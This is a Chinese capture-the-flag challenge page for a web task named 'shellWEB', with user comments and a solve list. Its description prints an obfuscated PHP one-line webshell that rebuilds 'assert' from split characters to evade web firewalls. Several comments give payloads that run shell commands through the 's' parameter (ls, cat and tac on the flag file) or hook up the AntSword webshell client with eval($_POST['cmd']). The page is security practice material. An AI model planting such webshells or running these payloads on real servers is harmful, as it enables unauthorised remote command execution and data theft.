shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 8347
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
一个姓⎝李⎠的师傅~ 9月前

自己的解题思路:https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#hjui5

回复 10

wywsssf 9月前

AI分析代码,参数格式为?s=system(''),先用ls目录,再用cat读取txt文件

回复 1

Bruce20231767 10月前

这道题两个方法,一个是用蚁剑连接,url/?s=eval($_POST['cmd'])。另一个是参数s接可执行命令(根据提示)system("ls"),获取网站目录下内容,发现有一个flag相关的txt文件,可以再使用system("cat {...}txt")命令,或者直接url/{...}.txt来获取内容

回复 1

2686213396 10月前

首先,这个描述给出提示,poc按#进行分割化为数组由poc2承接,而根据php语言的变量函数特性,最后一个式子会转为assert($_GET['s']),所以目标就是对s的值进行操作,进而获取服务器上隐藏的数据。选用system函数进行ls系统命令,读取服务器上可能存在的flag文件,再通过cat进行获取,得到最终的flag

回复 2

zhuizhui 11月前

?s=system('cat fl*')

回复 1

lwgzs 11月前

kan le tishi

回复 0

涵十柒 1年前

描述 的最后一段 猜测传参s /?s=system('ls')发现有回显 直接/?s=system('tac 《题目给的flag文件名》.txt')

回复 2

牢宁来了 1年前

用/?s=上传一句话木马,再用蚁剑链接

回复 0
一个姓⎝李⎠的师傅~ 9月前

@violetyy 不是上传,而是同时传递 URL 上查询参数和 POST 请求体里的蚁剑参数

回复 0

一个姓⎝李⎠的师傅~ 9月前

@xianyu520 不是上传,而是同时传递 URL 上查询参数和 POST 请求体里的蚁剑参数

回复 0

xianyu520 11月前

老哥,没有上传位置你是怎么在url里做的?个人见识浅薄,请多多指教

回复 0

violetyy 11月前

怎么上传?连接的url是什么呢?

回复 0

15290408231 1年前

?s=system(ls) 输入给出的flag.txt文件标题

回复 0

传奇吉他手千早爱音 1年前

flag{******}

回复 2

WriteUp

image
harry

3 金币

评分(10)

解题动态

warm007 攻破了该题 2小时前
R1 攻破了该题 6小时前
a591961189 攻破了该题 8小时前
阿杰学网安 攻破了该题 9小时前
yxm8085 攻破了该题 10小时前
xtelnet 攻破了该题 14小时前
dcd 攻破了该题 15小时前
bbbuild 攻破了该题 1天前
yy147369 攻破了该题 1天前
yiyiyiyi1 攻破了该题 1天前
搁浅的小鱼 攻破了该题 1天前
aaggyy1 攻破了该题 1天前
18737958336 攻破了该题 1天前
yehlg 攻破了该题 1天前
zzasas 攻破了该题 1天前
mybugku26 攻破了该题 1天前
sfwy 攻破了该题 1天前
天青色等烟雨 攻破了该题 1天前
沐恩 攻破了该题 1天前
a637814143 攻破了该题 2天前
问题反馈